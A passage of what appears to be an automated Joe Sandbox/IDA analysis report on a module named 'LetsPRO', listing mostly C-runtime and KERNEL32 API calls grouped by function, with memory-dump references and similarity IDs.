
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000088,00000000,00000000,00000002,00000000,00000000,6C9A001C,000000FF,?,6C940B58,?,?,?,00000000), ref: 6C938C60
                                        • GetCurrentThread.KERNEL32 ref: 6C938C63
                                        • GetCurrentProcess.KERNEL32(00000000,?,6C940B58,?,?,?,00000000), ref: 6C938C6A
                                        • DuplicateHandle.KERNEL32(00000000,?,6C940B58,?,?,?,00000000), ref: 6C938C6D
                                        • GetLastError.KERNEL32(?,6C940B58,?,?,?,00000000), ref: 6C938C77
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,6C940B58,?,?,?,00000000), ref: 6C938C8F
                                        • _CxxThrowException.MSVCR100(6C9A0D48,6C9A0D48,00000000,?,6C940B58,?,?,?,00000000), ref: 6C938C9D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Current$Process$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorExceptionHandleLastThreadThrow
                                        • String ID:
                                        • API String ID: 2881127307-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _FindAndUnlinkFrame.MSVCR100(?,6C97429F,?), ref: 6C9742BC
                                          • Part of subcall function 6C918411: _getptd.MSVCR100 ref: 6C918417
                                          • Part of subcall function 6C918411: _getptd.MSVCR100 ref: 6C91842B
                                        • _getptd.MSVCR100(6C97429F,?), ref: 6C9742C2
                                        • _getptd.MSVCR100(6C97429F,?), ref: 6C9742D0
                                        • _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6C974313
                                        • __DestructExceptionObject.MSVCR100(00000000,00000000), ref: 6C974321
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                        • String ID: csm
                                        • API String ID: 473968603-1018135373
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C94E9C5
                                        • _errno.MSVCR100 ref: 6C94E9CD
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94E9D8
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • GetFileAttributesA.KERNEL32(00000000), ref: 6C94E9E5
                                        • GetLastError.KERNEL32 ref: 6C94E9F0
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C94E9F7
                                        • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 6C94EA11
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AttributesFile$ErrorLast__doserrno__dosmaperr_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 567378056-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C9503C2
                                        • _errno.MSVCR100 ref: 6C9503CA
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C9503D5
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 6C9503E2
                                        • GetLastError.KERNEL32 ref: 6C9503ED
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C9503F4
                                        • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 6C95040E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AttributesFile$ErrorLast__doserrno__dosmaperr_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 567378056-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _getptd
                                        • String ID: MOC$RCC$csm
                                        • API String ID: 3186804695-2671469338
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _store_winword.LIBCMT ref: 6C972420
                                        • _store_winword.LIBCMT ref: 6C972445
                                        • _errno.MSVCR100(?,?,00000000,?,?,6C972AF4,?,?,?,00000000,?,?,?), ref: 6C97247E
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,00000000,?,?,6C972AF4,?,?,?,00000000,?,?,?), ref: 6C972489
                                        • __tzname.MSVCR100(?,?,00000000,?,?,6C972AF4,?,?,?,00000000,?,?,?), ref: 6C9724D0
                                        • _store_str.LIBCMT ref: 6C97256C
                                        Similarity
                                        • API ID: _store_winword$__tzname_errno_invalid_parameter_noinfo_store_str
                                        • String ID:
                                        • API String ID: 3353331024-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2959964966-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 6C939DE8
                                        • TlsSetValue.KERNEL32(?), ref: 6C939DFB
                                        • TlsSetValue.KERNEL32(00000000), ref: 6C939F60
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C939F85
                                        • _CxxThrowException.MSVCR100(?,6C939F9C), ref: 6C939F93
                                        • std::exception::exception.LIBCMT(00000000), ref: 6C939FB7
                                        Similarity
                                        • API ID: Value$Concurrency::unsupported_os::unsupported_osCurrentExceptionThreadThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 1797647509-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock.MSVCR100(0000000B,6C90AE08,00000018,6C9773E0,00000000,00000000,00000000), ref: 6C90ADC5
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • EnterCriticalSection.KERNEL32(0000000C,6C90AE08,00000018,6C9773E0,00000000,00000000,00000000), ref: 6C90AE44
                                        • _calloc_crt.MSVCR100(00000020,00000040,6C90AE08,00000018,6C9773E0,00000000,00000000,00000000), ref: 6C930524
                                        Similarity
                                        • API ID: CriticalEnterSection$_calloc_crt_lock
                                        • String ID:
                                        • API String ID: 3858677252-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00000001,?,?,?,?,6C906475,?,?,?), ref: 6C9063B5
                                        • _memset.LIBCMT(00000000,00000000,00000000,?,?,?,6C906475,?,?,?,?,?,?,?,?,?), ref: 6C9063FB
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 6C906410
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6C90641E
                                        • _freea_s.MSVCR100(00000000), ref: 6C906428
                                        • malloc.MSVCR100(00000008,?,?,?,6C906475,?,?,?,?,?,?,?,?,?,?,?), ref: 6C930D59
                                        Similarity
                                        • API ID: ByteCharMultiWide$StringType_freea_s_memsetmalloc
                                        • String ID:
                                        • API String ID: 2935806426-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,?,?,6C90036A,?,?,00000000), ref: 6C927986
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,6C90036A,?,?,00000000), ref: 6C927990
                                        • _errno.MSVCR100(?,?,?,?,6C90036A,?,?,00000000), ref: 6C92799C
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6C90036A,?,?,00000000), ref: 6C9279A6
                                        • _errno.MSVCR100(?,?,?,?,6C90036A,?,?,00000000), ref: 6C9279B2
                                        • _errno.MSVCR100(?,?,?,?,?,6C90036A,?,?,00000000), ref: 6C9279D1
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2819658684-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6C904417
                                          • Part of subcall function 6C90257C: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6C9025C0
                                        • _towlower_l.MSVCR100(00000000,?,?,?,?,?,?), ref: 6C90442A
                                        • _errno.MSVCR100(?), ref: 6C92C541
                                        • _invalid_parameter_noinfo.MSVCR100(?), ref: 6C92C54C
                                        • _errno.MSVCR100(?,?), ref: 6C92C567
                                        • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6C92C572
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo_towlower_l$iswctype
                                        • String ID:
                                        • API String ID: 3991495309-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C94647A
                                        • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 6C946488
                                        • GetTickCount.KERNEL32 ref: 6C94648F
                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6C9464B3
                                        • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6C9464E8
                                        • CloseHandle.KERNEL32(?), ref: 6C946594
                                        Similarity
                                        • API ID: AcquireBase::CloseConcurrency::details::Concurrency@@CountH_prolog3HandleLock@details@ObjectReaderSchedulerSingleThrottlingTickTimeWaitWrite@_Writer
                                        • String ID:
                                        • API String ID: 1057910834-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _strnicoll_l.MSVCR100(?,?,?,?,021F17E8,?,?,?,?,?,?,?), ref: 6C911C25
                                          • Part of subcall function 6C911B5F: _strnicmp_l.MSVCR100(?,021F17E8,?,?,7FFFFFFF,00000000,00000000,?,021F17E8,?,?,?,?,?,?,?), ref: 6C911BB9
                                        • _errno.MSVCR100(?,?,?,?,?,?,?), ref: 6C92AB34
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?), ref: 6C92AB3F
                                        • _errno.MSVCR100(021F17E8,?,?,?,?,?,?,?), ref: 6C92AB5A
                                        • _invalid_parameter_noinfo.MSVCR100(021F17E8,?,?,?,?,?,?,?), ref: 6C92AB65
                                        • __crtCompareStringA.MSVCR100(?,?,00001001,?,?,?,?,00000000,021F17E8,?,?,?,?,?,?,?), ref: 6C92AB83
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$CompareString__crt_strnicmp_l_strnicoll_l
                                        • String ID:
                                        • API String ID: 1477060370-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000,6C9A55DC,?,00000004), ref: 6C941DB5
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?,00000000), ref: 6C941DC5
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?,00000000,6C93FCF4,?,00000014,6C949BE7,00000000,?,00000008,6C9400DB,?), ref: 6C941DCC
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C941DFA
                                        • InitializeSListHead.KERNEL32(?), ref: 6C941E0F
                                        • InitializeSListHead.KERNEL32(?), ref: 6C941E15
                                        Similarity
                                        • API ID: HeadInitializeList$??2@_memsetmalloc
                                        • String ID:
                                        • API String ID: 2874038712-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C93F95F
                                        • _memset.LIBCMT(00000000,00000000,?,00000000), ref: 6C93F96F
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000), ref: 6C93F976
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,6C941862), ref: 6C93F9A4
                                        • InitializeSListHead.KERNEL32(00000018,00000000,6C941862), ref: 6C93F9B9
                                        • InitializeSListHead.KERNEL32(00000020), ref: 6C93F9BF
                                        Similarity
                                        • API ID: HeadInitializeList$??2@_memsetmalloc
                                        • String ID:
                                        • API String ID: 2874038712-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C943B28
                                        • _memset.LIBCMT(00000000,00000000,?,00000000), ref: 6C943B38
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000), ref: 6C943B3F
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,6C941807), ref: 6C943B6D
                                        • InitializeSListHead.KERNEL32(00000010,00000000,6C941807), ref: 6C943B82
                                        • InitializeSListHead.KERNEL32(00000018), ref: 6C943B88
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: HeadInitializeList$??2@_memsetmalloc
                                        • String ID:
                                        • API String ID: 2874038712-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6C917C39
                                        • _calloc_crt.MSVCR100(00000001,00000002), ref: 6C927A26
                                        • _errno.MSVCR100 ref: 6C927A33
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory_calloc_crt_errno
                                        • String ID:
                                        • API String ID: 1856998256-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _fileno.MSVCR100(?,?,?,?,?,6C9130F1,?), ref: 6C90CE0D
                                        • _read.MSVCR100(00000000,?,?,?,?,6C9130F1,?), ref: 6C90CE14
                                        • _fileno.MSVCR100(?), ref: 6C90CE37
                                        • _fileno.MSVCR100(?), ref: 6C90CE47
                                        • _fileno.MSVCR100(?), ref: 6C90CE58
                                        • _fileno.MSVCR100(?,?), ref: 6C90CE68
                                        • _errno.MSVCR100(?,?,6C9130F1,?), ref: 6C92875C
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C9130F1,?), ref: 6C928767
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno$_errno_invalid_parameter_noinfo_read
                                        • String ID:
                                        • API String ID: 2022966298-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C947E47
                                        • WaitForSingleObject.KERNEL32(?,00000000,00000010,6C947DB7), ref: 6C947E5D
                                        • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6C947E7A
                                        • CloseHandle.KERNEL32(?), ref: 6C947EFA
                                        • CloseHandle.KERNEL32(00000000), ref: 6C947F03
                                        • ??3@YAXPAX@Z.MSVCR100(?), ref: 6C947F06
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandle$??3@AcquireConcurrency@@H_prolog3Lock@details@ObjectReaderSingleWaitWrite@_Writer
                                        • String ID:
                                        • API String ID: 1148406726-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C97CEFF
                                        • _errno.MSVCR100 ref: 6C97CF3B
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CF0A
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C97CF1B
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CF26
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CF46
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID:
                                        • API String ID: 1328987296-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C97CE76
                                        • _errno.MSVCR100 ref: 6C97CEB2
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CE81
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C97CE92
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CE9D
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97CEBD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID:
                                        • API String ID: 1328987296-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcslen.LIBCMT(00000000,00000000,00000000,00000000,?,6C91746A,00000000,00000000,00000000,0000003D,?,6C917486,7591DF80,00000000,021F17E8), ref: 6C91196B
                                        • calloc.MSVCR100(00000001,00000002,00000000,00000000,00000000,00000000,?,6C91746A,00000000,00000000,00000000,0000003D,?,6C917486,7591DF80,00000000), ref: 6C911976
                                        • wcscpy_s.MSVCR100(00000000,00000001,00000000,7591DF80,00000000,021F17E8), ref: 6C911989
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,7591DF80,00000000,021F17E8), ref: 6C9297E9
                                        • _errno.MSVCR100 ref: 6C929800
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92980A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __invoke_watson_errno_invalid_parameter_noinfo_wcslencallocwcscpy_s
                                        • String ID:
                                        • API String ID: 2624155197-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __doserrno.MSVCR100(6C90A7F0,00000010), ref: 6C90A814
                                        • __doserrno.MSVCR100(6C90A7F0,00000010), ref: 6C92F526
                                        • _errno.MSVCR100(6C90A7F0,00000010), ref: 6C92F52E
                                        • _errno.MSVCR100(6C90A7F0,00000010), ref: 6C92F544
                                        • _invalid_parameter_noinfo.MSVCR100(6C90A7F0,00000010), ref: 6C92F54F
                                        • _errno.MSVCR100(6C90A7F0,00000010), ref: 6C92F556
                                          • Part of subcall function 6C90A51F: EnterCriticalSection.KERNEL32(00000108,6C90A580,0000000C,6C90ECA7,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?), ref: 6C90A570
                                          • Part of subcall function 6C90A6FA: _get_osfhandle.MSVCR100(?,?,?,?,6C90A7D5,?,6C90A7F0,00000010), ref: 6C90A705
                                          • Part of subcall function 6C90A6FA: _get_osfhandle.MSVCR100(?), ref: 6C90A728
                                          • Part of subcall function 6C90A6FA: CloseHandle.KERNEL32(00000000), ref: 6C90A72F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__doserrno_get_osfhandle$CloseCriticalEnterHandleSection_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1720121285-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __freebuf.LIBCMT ref: 6C90A873
                                          • Part of subcall function 6C90A81E: free.MSVCR100(?,?,?,6C90A878,?,?), ref: 6C90A835
                                        • _fileno.MSVCR100(?,?,?), ref: 6C90A879
                                        • _close.MSVCR100(00000000,?,?,?), ref: 6C90A87F
                                        • _errno.MSVCR100 ref: 6C928BE4
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C928BEF
                                          • Part of subcall function 6C90A5D5: _fileno.MSVCR100(?,?,?,?,?,?,?,6C90A870,?), ref: 6C90A604
                                          • Part of subcall function 6C90A5D5: _write.MSVCR100(00000000,?,?,?,?,?,?,6C90A870,?), ref: 6C90A60B
                                        • free.MSVCR100(?), ref: 6C928C04
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _filenofree$__freebuf_close_errno_invalid_parameter_noinfo_write
                                        • String ID:
                                        • API String ID: 1941134952-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(00000000,00000000,?,6C9523AA,6C9A5F58,?,?,?,00000000), ref: 6C95223F
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,6C9523AA,6C9A5F58,?,?,?,00000000), ref: 6C95224A
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __cenvarg.LIBCMT ref: 6C95226B
                                        • __dospawn.LIBCMT ref: 6C952285
                                        • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C95228F
